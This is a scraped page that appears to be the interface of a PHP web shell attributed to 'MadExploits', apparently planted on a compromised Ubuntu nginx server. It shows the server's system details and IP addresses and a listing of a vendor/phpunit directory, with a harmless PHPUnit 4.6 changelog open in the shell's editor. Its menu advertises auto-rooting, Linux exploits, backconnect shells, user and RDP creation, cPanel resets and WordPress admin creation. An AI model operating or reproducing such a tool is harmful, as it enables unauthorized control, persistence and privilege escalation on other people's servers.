Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
phpunit /
phpunit /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitattributes
42
B
-rw-r--r--
.gitignore
323
B
-rw-r--r--
.php_cs
3.05
KB
-rw-r--r--
.stickler.yml
53
B
-rw-r--r--
.travis.yml
1.37
KB
-rw-r--r--
ChangeLog-4.0.md
7.87
KB
-rw-r--r--
ChangeLog-4.1.md
3.54
KB
-rw-r--r--
ChangeLog-4.2.md
2.41
KB
-rw-r--r--
ChangeLog-4.3.md
2.46
KB
-rw-r--r--
ChangeLog-4.4.md
2.32
KB
-rw-r--r--
ChangeLog-4.5.md
1.24
KB
-rw-r--r--
ChangeLog-4.6.md
4.16
KB
-rw-r--r--
ChangeLog-4.7.md
3
KB
-rw-r--r--
ChangeLog-4.8.md
12.16
KB
-rw-r--r--
ChangeLog-5.0.md
6.23
KB
-rw-r--r--
ChangeLog-5.1.md
2.72
KB
-rw-r--r--
ChangeLog-5.2.md
5.09
KB
-rw-r--r--
ChangeLog-5.3.md
2.56
KB
-rw-r--r--
ChangeLog-5.4.md
4.47
KB
-rw-r--r--
ChangeLog-5.5.md
2.86
KB
-rw-r--r--
ChangeLog-5.6.md
3.73
KB
-rw-r--r--
ChangeLog-5.7.md
9.79
KB
-rw-r--r--
LICENSE
1.54
KB
-rw-r--r--
README.md
2.15
KB
-rw-r--r--
build.xml
18.74
KB
-rw-r--r--
composer.json
2.13
KB
-rw-r--r--
phpunit
1.3
KB
-rw-r--r--
phpunit.xml
1.22
KB
-rw-r--r--
phpunit.xsd
12.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ChangeLog-4.6.md
# Changes in PHPUnit 4.6 All notable changes of the PHPUnit 4.6 release series are documented in this file using the [Keep a CHANGELOG](http://keepachangelog.com/) principles. ## [4.6.10] - 2015-06-03 ### Changed * Merged [#1693](https://github.com/sebastianbergmann/phpunit/pull/1693): Improved API documentation * Merged [#1706](https://github.com/sebastianbergmann/phpunit/pull/1706): Avoid hard-coded URI to `phpunit.xsd` * Merged [#1725](https://github.com/sebastianbergmann/phpunit/pull/1725): Update phpDox XSD URI * Merged [#1735](https://github.com/sebastianbergmann/phpunit/pull/1735): Mute `chdir()` failures in XInclude handling of XML configuration file * Merged [#1736](https://github.com/sebastianbergmann/phpunit/pull/1736): Verify that phar file can be overwritten before attempting self update ### Fixed * Fixed [#1737](https://github.com/sebastianbergmann/phpunit/issues/1737): Confusing output from `--testdox` for empty test class ## [4.6.9] - 2015-05-29 ### Fixed * Fixed [#1731](https://github.com/sebastianbergmann/phpunit/issues/1731): `.` after failure count has no background color when `--colors` is used ## [4.6.8] - 2015-05-28 New PHAR release due to updated dependencies ## [4.6.7] - 2015-05-25 New PHAR release due to updated dependencies ## [4.6.6] - 2015-04-29 ### Fixed * Fixed [#1684](https://github.com/sebastianbergmann/phpunit/issues/1684): PHAR does not work on HHVM ## [4.6.5] - 2015-04-29 * Fixed [#1677](https://github.com/sebastianbergmann/phpunit/issues/1677): Number of risky tests not printed when there are failing tests * Fixed [#1688](https://github.com/sebastianbergmann/phpunit/issues/1688): Self-Update operation does not work due to outdated SSL certificate ## [4.6.4] - 2015-04-11 ### Changed * The default list of blacklisted classes is now always passed to PHP_CodeCoverage ## [4.6.3] - 2015-04-11 ### Changed * Updated the default list of blacklisted classes ## [4.6.2] - 2015-04-07 ### Fixed * Fixed [#1667](https://github.com/sebastianbergmann/phpunit/issues/1667): Loading `src/Framework/Assert/Functions.php` by default causes collisions ## [4.6.1] - 2015-04-03 ### Fixed * Fixed [#1665](https://github.com/sebastianbergmann/phpunit/issues/1665): PHPUnit 4.6.0 PHAR does not work when renamed to `phpunit` ## [4.6.0] - 2015-04-03 ### Added * Added the `--strict-global-state` command-line option and the `beStrictAboutChangesToGlobalState` configuration setting for enabling a check that global variabes, super-global variables, and static attributes in user-defined classes are not modified during a test * Merged [#1527](https://github.com/sebastianbergmann/phpunit/issues/1527) and [#1529](https://github.com/sebastianbergmann/phpunit/issues/1529): Allow to define options for displaying colors ### Changed * Merged [#1528](https://github.com/sebastianbergmann/phpunit/issues/1528): Improve message when `PHPUnit_Framework_Constraint_Count` is used with logical operators ### Fixed * Merged [#1537](https://github.com/sebastianbergmann/phpunit/issues/1537): Fix problem of `--stderr` with `--tap` and `--testdox` * Fixed [#1599](https://github.com/sebastianbergmann/phpunit/issues/1599): The PHAR build of PHPUnit no longer uses an autoloader to load PHPUnit's own classes and instead statically loads all classes on startup [4.6.10]: https://github.com/sebastianbergmann/phpunit/compare/4.6.9...4.6.10 [4.6.9]: https://github.com/sebastianbergmann/phpunit/compare/4.6.8...4.6.9 [4.6.8]: https://github.com/sebastianbergmann/phpunit/compare/4.6.7...4.6.8 [4.6.7]: https://github.com/sebastianbergmann/phpunit/compare/4.6.6...4.6.7 [4.6.6]: https://github.com/sebastianbergmann/phpunit/compare/4.6.5...4.6.6 [4.6.5]: https://github.com/sebastianbergmann/phpunit/compare/4.6.4...4.6.5 [4.6.4]: https://github.com/sebastianbergmann/phpunit/compare/4.6.3...4.6.4 [4.6.3]: https://github.com/sebastianbergmann/phpunit/compare/4.6.2...4.6.3 [4.6.2]: https://github.com/sebastianbergmann/phpunit/compare/4.6.1...4.6.2 [4.6.1]: https://github.com/sebastianbergmann/phpunit/compare/4.6.0...4.6.1 [4.6.0]: https://github.com/sebastianbergmann/phpunit/compare/4.5...4.6.0
Close